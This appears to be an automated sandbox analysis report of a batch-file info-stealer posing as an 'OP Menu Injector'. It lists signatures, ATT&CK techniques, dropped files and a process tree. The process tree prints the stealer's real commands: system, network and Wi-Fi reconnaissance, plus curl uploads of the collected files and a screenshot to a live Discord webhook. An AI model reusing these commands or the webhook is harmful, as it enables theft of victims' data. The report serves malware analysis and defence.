ed1afd9e38b5cf3ab66a1eac961bd4ad97c0bcecf03243d3a27da9346dd5af8a

Analysis

max time kernel
1763s
max time network
1153s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
06-08-2023 07:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OP Menu Injector.bat
Size

19KB
MD5

7ad0af90973f789660df31945a324845
SHA1

7d4ad82a26c36c55e58af44f9591958388b65dc7
SHA256

ed1afd9e38b5cf3ab66a1eac961bd4ad97c0bcecf03243d3a27da9346dd5af8a
SHA512

acd2da83ee834a3448168f7b34753fc79019bbd229c4af6c5977a506adc64d41ffac6822fc6334add1293330afec34a0ee162db68e6a8e11ff1fc6dafc3c86ea
SSDEEP

384:WatbMSdVAg9120aNEkfdYGxQYUfPt7GusKrTt2OoXatp4:WECDfNEmYGxQYUfPt7GusKrTtHoXatp4

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
71	2356	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	myexternalip.com
5	myexternalip.com

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2328	timeout.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1296	ipconfig.exe
2108	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4208	systeminfo.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1848	NOTEPAD.EXE
1416	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1636	powershell.exe
1636	powershell.exe
3164	powershell.exe
3164	powershell.exe
2356	powershell.exe
2356	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeIncreaseQuotaPrivilege	1444	WMIC.exe
Token: SeSecurityPrivilege	1444	WMIC.exe
Token: SeTakeOwnershipPrivilege	1444	WMIC.exe
Token: SeLoadDriverPrivilege	1444	WMIC.exe
Token: SeSystemProfilePrivilege	1444	WMIC.exe
Token: SeSystemtimePrivilege	1444	WMIC.exe
Token: SeProfSingleProcessPrivilege	1444	WMIC.exe
Token: SeIncBasePriorityPrivilege	1444	WMIC.exe
Token: SeCreatePagefilePrivilege	1444	WMIC.exe
Token: SeBackupPrivilege	1444	WMIC.exe
Token: SeRestorePrivilege	1444	WMIC.exe
Token: SeShutdownPrivilege	1444	WMIC.exe
Token: SeDebugPrivilege	1444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1444	WMIC.exe
Token: SeRemoteShutdownPrivilege	1444	WMIC.exe
Token: SeUndockPrivilege	1444	WMIC.exe
Token: SeManageVolumePrivilege	1444	WMIC.exe
Token: 33	1444	WMIC.exe
Token: 34	1444	WMIC.exe
Token: 35	1444	WMIC.exe
Token: 36	1444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1444	WMIC.exe
Token: SeSecurityPrivilege	1444	WMIC.exe
Token: SeTakeOwnershipPrivilege	1444	WMIC.exe
Token: SeLoadDriverPrivilege	1444	WMIC.exe
Token: SeSystemProfilePrivilege	1444	WMIC.exe
Token: SeSystemtimePrivilege	1444	WMIC.exe
Token: SeProfSingleProcessPrivilege	1444	WMIC.exe
Token: SeIncBasePriorityPrivilege	1444	WMIC.exe
Token: SeCreatePagefilePrivilege	1444	WMIC.exe
Token: SeBackupPrivilege	1444	WMIC.exe
Token: SeRestorePrivilege	1444	WMIC.exe
Token: SeShutdownPrivilege	1444	WMIC.exe
Token: SeDebugPrivilege	1444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1444	WMIC.exe
Token: SeRemoteShutdownPrivilege	1444	WMIC.exe
Token: SeUndockPrivilege	1444	WMIC.exe
Token: SeManageVolumePrivilege	1444	WMIC.exe
Token: 33	1444	WMIC.exe
Token: 34	1444	WMIC.exe
Token: 35	1444	WMIC.exe
Token: 36	1444	WMIC.exe
Token: SeIncreaseQuotaPrivilege	792	WMIC.exe
Token: SeSecurityPrivilege	792	WMIC.exe
Token: SeTakeOwnershipPrivilege	792	WMIC.exe
Token: SeLoadDriverPrivilege	792	WMIC.exe
Token: SeSystemProfilePrivilege	792	WMIC.exe
Token: SeSystemtimePrivilege	792	WMIC.exe
Token: SeProfSingleProcessPrivilege	792	WMIC.exe
Token: SeIncBasePriorityPrivilege	792	WMIC.exe
Token: SeCreatePagefilePrivilege	792	WMIC.exe
Token: SeBackupPrivilege	792	WMIC.exe
Token: SeRestorePrivilege	792	WMIC.exe
Token: SeShutdownPrivilege	792	WMIC.exe
Token: SeDebugPrivilege	792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	792	WMIC.exe
Token: SeRemoteShutdownPrivilege	792	WMIC.exe
Token: SeUndockPrivilege	792	WMIC.exe
Token: SeManageVolumePrivilege	792	WMIC.exe
Token: 33	792	WMIC.exe
Token: 34	792	WMIC.exe
Token: 35	792	WMIC.exe
Token: 36	792	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1848	NOTEPAD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3164	powershell.exe
3164	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 2944 wrote to memory of 3804	2944	cmd.exe	84
PID 2944 wrote to memory of 3804	2944	cmd.exe	84
PID 3804 wrote to memory of 884	3804	net.exe	85
PID 3804 wrote to memory of 884	3804	net.exe	85
PID 2944 wrote to memory of 4912	2944	cmd.exe	86
PID 2944 wrote to memory of 4912	2944	cmd.exe	86
PID 2944 wrote to memory of 1636	2944	cmd.exe	87
PID 2944 wrote to memory of 1636	2944	cmd.exe	87
PID 2944 wrote to memory of 1444	2944	cmd.exe	89
PID 2944 wrote to memory of 1444	2944	cmd.exe	89
PID 2944 wrote to memory of 792	2944	cmd.exe	91
PID 2944 wrote to memory of 792	2944	cmd.exe	91
PID 2944 wrote to memory of 2904	2944	cmd.exe	93
PID 2944 wrote to memory of 2904	2944	cmd.exe	93
PID 2944 wrote to memory of 4208	2944	cmd.exe	94
PID 2944 wrote to memory of 4208	2944	cmd.exe	94
PID 2944 wrote to memory of 2404	2944	cmd.exe	100
PID 2944 wrote to memory of 2404	2944	cmd.exe	100
PID 2944 wrote to memory of 4396	2944	cmd.exe	101
PID 2944 wrote to memory of 4396	2944	cmd.exe	101
PID 4396 wrote to memory of 3068	4396	cmd.exe	102
PID 4396 wrote to memory of 3068	4396	cmd.exe	102
PID 2944 wrote to memory of 1296	2944	cmd.exe	104
PID 2944 wrote to memory of 1296	2944	cmd.exe	104
PID 2944 wrote to memory of 2108	2944	cmd.exe	105
PID 2944 wrote to memory of 2108	2944	cmd.exe	105
PID 2944 wrote to memory of 2328	2944	cmd.exe	106
PID 2944 wrote to memory of 2328	2944	cmd.exe	106
PID 2944 wrote to memory of 3164	2944	cmd.exe	107
PID 2944 wrote to memory of 3164	2944	cmd.exe	107
PID 3164 wrote to memory of 3788	3164	powershell.exe	110
PID 3164 wrote to memory of 3788	3164	powershell.exe	110
PID 2944 wrote to memory of 2236	2944	cmd.exe	111
PID 2944 wrote to memory of 2236	2944	cmd.exe	111
PID 2944 wrote to memory of 4220	2944	cmd.exe	112
PID 2944 wrote to memory of 4220	2944	cmd.exe	112
PID 2944 wrote to memory of 3332	2944	cmd.exe	113
PID 2944 wrote to memory of 3332	2944	cmd.exe	113
PID 2944 wrote to memory of 4436	2944	cmd.exe	114
PID 2944 wrote to memory of 4436	2944	cmd.exe	114
PID 2944 wrote to memory of 4912	2944	cmd.exe	115
PID 2944 wrote to memory of 4912	2944	cmd.exe	115
PID 2944 wrote to memory of 4780	2944	cmd.exe	117
PID 2944 wrote to memory of 4780	2944	cmd.exe	117
PID 2944 wrote to memory of 1668	2944	cmd.exe	118
PID 2944 wrote to memory of 1668	2944	cmd.exe	118
PID 2944 wrote to memory of 1740	2944	cmd.exe	119
PID 2944 wrote to memory of 1740	2944	cmd.exe	119
PID 2944 wrote to memory of 2356	2944	cmd.exe	120
PID 2944 wrote to memory of 2356	2944	cmd.exe	120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OP Menu Injector.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:884
- C:\Windows\system32\curl.exe
  curl -o C:\Users\Admin\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw
  2⤵
  PID:4912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\AppData\Local\Temp\programms.txt "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get size
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1444
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get serialnumber
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:792
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  PID:2904
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4208
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get uuid
  2⤵
  PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh wlan show profile
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    PID:3068
- C:\Windows\system32\ipconfig.exe
  ipconfig /all
  2⤵
  - Gathers network information
  PID:1296
- C:\Windows\system32\NETSTAT.EXE
  netstat -an
  2⤵
  - Gathers network information
  PID:2108
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\test.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Windows\system32\curl.exe
    "C:\Windows\system32\curl.exe" -i -F file=@C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
    3⤵
    PID:3788
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = Admin Ip = 154.61.71.13 time = 7:10:55.82 date = Sun 08/06/2023 os = Windows_NT Computername = LMMMEQUO ```\"}" https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:2236
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\System_INFO.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:4220
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\sysi.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:3332
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\ip.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:4436
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\netstat.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:4912
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\programms.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:4780
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\uuid.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:1668
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\wlan.txt https://discord.com/api/webhooks/1137601225928486912/C356FRtlCF6a-LVmDsvwOXijO8f8bkdZubw284UsH1Fc414nHlNVIuSfE18HxKc-N3_F
  2⤵
  PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\testtttt.ps1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:2356

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\LolGetDoxed.txt
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1848

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\LolGetDoxed.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
794c28e5897ec39f02d0ee085aa193ba

SHA1
cee9deb0df0ce0e99c7be729ca56b2cc9d01c85a

SHA256
c6c9837262426aca9df8f10e124798e52e182f30c9cef96e6ddf36ce984eeec2

SHA512
7880fb69fc68e8a14cc3199068f506284c78c5c9f2a4b1d96533308dc43308ebbaf183b3f752c54b73c96dc80b27023bcfa8bc1ebe6e7cf92598266bafdf975d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2af50ca500f955d4434fc268c4e91349

SHA1
eb8b2313e4bf0c517e46086662ce1571b6fb0d21

SHA256
d283617c9b54db2db1c285e5c2c94bb55b8af9e09274521ef669cb4723d108f5

SHA512
62acaa111eda79ee2ae7004c6b55a0a9635f8089fa747f3430530f126246775e4e2d58f1155d3c98714ba9de9bdc6de01f9457915dd265f94c932154c91f16e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg

Filesize
60KB

MD5
e2ab69d8c0a083a8a7947fe4e6f6fbf4

SHA1
7d694d1f38b0ded47a86e49f0f3c28b1ce3b58d0

SHA256
c0d399ea1d61d35397b16f30e803f9f5e3fbc37ecc8bb3faacb805ad5d27ad1c

SHA512
20b932281d60bb1277aef950c3589430bfd3ff184a8b1d1e0b9319a1355aa4edc1ea5af93260773240cc76b4f0fb066295f3f05c3280a49abc9a91e5b16d0ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\System_INFO.txt

Filesize
311B

MD5
533c630c2f09949235ff3d463041deff

SHA1
be73ac6c09729d9063001f2c05c61b8b816ff303

SHA256
734eb105772c9c6878017c9ab34fa0f4bb73e0142aab068b71161d28776c835c

SHA512
e0581b8b11175f5bc1aeada6be7772f7c889bf64ad40b7c87ad4feea536a96b875dd8d97f7ed5e791671f0453e70954eacdebb58cf667d5c9fdb33eff1221ca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dq5jp3r.2nu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1023B

MD5
ec24f84da9b70d5cb34b60ea9d5468e2

SHA1
a461bec7ff0611450aaccfe44612f8ead2cde884

SHA256
7565f20ce7b12f26d5c3d7fde2fceb12ef5f40b120713956f0b8953fa13a0608

SHA512
a1e52725959ccb35bc8761986c9767da9a0658affc36214f1cc090c464cd6a4294b0f68345717c60a3b42ec69561c4336f104ba6c10029b4bec234e6daa43667

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipp.txt

Filesize
12B

MD5
71d587e911373f62d72a158eceb6e0e7

SHA1
68d81a1a4fb19c609288a94f10d1bbb92d972a68

SHA256
acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8

SHA512
a0010c487c8b1eeae82ae82896bf5f48b7ec5573197bbe149b6803093a32b3b470ef0b122278e404cd5df296376bb0629438609997d52c14757ff1c3e6756060

Download Submit
C:\Users\Admin\AppData\Local\Temp\netstat.txt

Filesize
2KB

MD5
41da6da4e48df6a923632ea90247657e

SHA1
c6ceb2e5528075248c072ad9c67830f1fd50b69f

SHA256
0d43c97ecc55007b36edfee02c938b9b46928a2286d92d59b2cfbd894f20167a

SHA512
76cd3c54bd91ef12f07844d857dcb693d23b772773b2b4704d81c920d07082649979c39df3070d0b699b117b6cde21f824659a6a6ccdea446bfd4f34c059b846

Download Submit
C:\Users\Admin\AppData\Local\Temp\programms.txt

Filesize
8KB

MD5
2380474a72c86be01d69b20702e5bdb3

SHA1
032b9dfb9410b8f7348c787232e43694f575c050

SHA256
a860fa9b2ad8b8d99629324ce0d6956f61c6007e9509b3dd007d19c250b23f8a

SHA512
a5168bc9073b458942f1e27ad85e16a6ee33bf467ad7a18ac214b8fa26bed09b9cf77ed08d76c9538dbd8fcca11eb19a92372e3218b675f92f19699e2923294b

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysi.txt

Filesize
2KB

MD5
42e971234f49c5701568876b086929b6

SHA1
4afef285f6a3d13d18f48260c80e6813790217c6

SHA256
af026d591149ef6251d52f876f6f9fdbdb54fa470d2fff6f249176ed5087265f

SHA512
7bae324da60ebc5b82678106bcaaf8e455baadacbcb36641e9c8d4d863ca74b7b88e655f4c01a091bba5b809a5bed1609a29e3f9c7abb65dd9f99c7a231f8dfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.ps1

Filesize
1KB

MD5
b213b5159a9bc1779621321182940323

SHA1
8d7fb83e1ea2a19a22ff9a616b95fdd3a9697173

SHA256
ef33be8fbc17057512b9529e8ea00104fd68485030243db04516ed22b9d632d2

SHA512
c330b40397ab4abc7775cd87dd3c7a71270311d1fa21db970b5734f25b95cb0702bc6936214564b2c06f7a9f55b640445e276d3bb56b675a9960acd702e9ac93

Download Submit
C:\Users\Admin\AppData\Local\Temp\testtttt.ps1

Filesize
2KB

MD5
6d8c251a1814acdd7fedf378aa387192

SHA1
804b5933e3805ec6d9fcde7e667ea7d8434ece6f

SHA256
52e33a1288f7d89d7fb6488efab10fd934f760c5eff8f87e09e03dc17cc7ea11

SHA512
c69a05a8135ee3fcaa21dd65902d4a89c0fcc98178ed631ace0a2f5b57bf6f91834251514f65772d032ab4e538b29e328cb265712d50f1ace46aa780a9252860

Download Submit
C:\Users\Admin\AppData\Local\Temp\uuid.txt

Filesize
162B

MD5
9d9362fca70310015cd0561d9a9deafc

SHA1
31d83515b7d090a6602e541976086938e5769cc6

SHA256
f78de8ee7109fd3970aa6c014eb01717c55a78c57c7bf1f7a5b898afb13bb13b

SHA512
161790306e40b5b7e957b764b679869ab2d8e104cf8c38321fe4eed98f201a5ca7c168ab59beeddd167257e99958a27011ab6b04cba3f67276544186b3103355

Download Submit
C:\Users\Admin\Desktop\LolGetDoxed.txt

Filesize
71B

MD5
d9e12bbe2c2d8863a9301b9551fb7047

SHA1
beb9d6fc4847680fe09ee2c97effb4fe83f3a37c

SHA256
d3004a4d38956907bc7bb909a9d660a7cdad00b1cb0c6ddc94fece0c006bcc61

SHA512
40cbb2565646ffaa13564eb298257781579fab3d7c49ea54615d6daaf5faadd14237387b785d206176684ff9a2a43f21abf8f170f0dae55e1a426985b8082b34

Download Submit
memory/1636-141-0x0000021B7F0F0000-0x0000021B7F112000-memory.dmp

Filesize
136KB

Download
memory/1636-146-0x00007FFEE8370000-0x00007FFEE8E31000-memory.dmp

Filesize
10.8MB

Download
memory/1636-147-0x0000021B7F0A0000-0x0000021B7F0B0000-memory.dmp

Filesize
64KB

Download
memory/1636-152-0x00007FFEE8370000-0x00007FFEE8E31000-memory.dmp

Filesize
10.8MB

Download
memory/1636-148-0x0000021B7F0A0000-0x0000021B7F0B0000-memory.dmp

Filesize
64KB

Download
memory/2356-282-0x000001F452420000-0x000001F452430000-memory.dmp

Filesize
64KB

Download
memory/2356-281-0x00007FFEE6C00000-0x00007FFEE76C1000-memory.dmp

Filesize
10.8MB

Download
memory/2356-284-0x000001F452420000-0x000001F452430000-memory.dmp

Filesize
64KB

Download
memory/2356-286-0x000001F4533B0000-0x000001F453572000-memory.dmp

Filesize
1.8MB

Download
memory/2356-287-0x000001F453AB0000-0x000001F453FD8000-memory.dmp

Filesize
5.2MB

Download
memory/2356-288-0x000001F454790000-0x000001F454F36000-memory.dmp

Filesize
7.6MB

Download
memory/2356-291-0x00007FFEE6C00000-0x00007FFEE76C1000-memory.dmp

Filesize
10.8MB

Download
memory/3164-208-0x00007FFEE6C00000-0x00007FFEE76C1000-memory.dmp

Filesize
10.8MB

Download
memory/3164-205-0x000001E8A0D70000-0x000001E8A0D80000-memory.dmp

Filesize
64KB

Download
memory/3164-201-0x000001E8A0D70000-0x000001E8A0D80000-memory.dmp

Filesize
64KB

Download
memory/3164-200-0x000001E8A0D70000-0x000001E8A0D80000-memory.dmp

Filesize
64KB

Download
memory/3164-195-0x00007FFEE6C00000-0x00007FFEE76C1000-memory.dmp

Filesize
10.8MB

Download